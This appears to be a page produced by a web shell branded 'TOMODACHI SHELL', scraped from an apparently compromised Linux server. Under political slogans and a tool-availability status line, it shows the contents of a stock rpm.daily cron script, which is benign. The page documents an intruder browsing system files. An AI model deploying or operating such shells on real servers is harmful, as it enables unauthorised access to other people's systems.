TOMODACHI SHELL
Free Palestine !! - Free Gaza !!
OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /lib/fontconfig/../rpm/ |
|
Current File : //lib/fontconfig/../rpm/rpm.daily |
#!/bin/sh
tmpfile=`/bin/mktemp /var/log/rpmpkgs.XXXXXXXXX` || exit 1
/bin/rpm -qa --qf '%{name}-%{version}-%{release}.%{arch}.rpm\n' 2>&1 \
| /bin/sort > "$tmpfile"
if [ ! -s "$tmpfile" ]; then
rm -f "$tmpfile"
exit 1
fi
/bin/mv "$tmpfile" /var/log/rpmpkgs
/bin/chmod 0644 /var/log/rpmpkgs
TOMODACHI | Tempest Hacker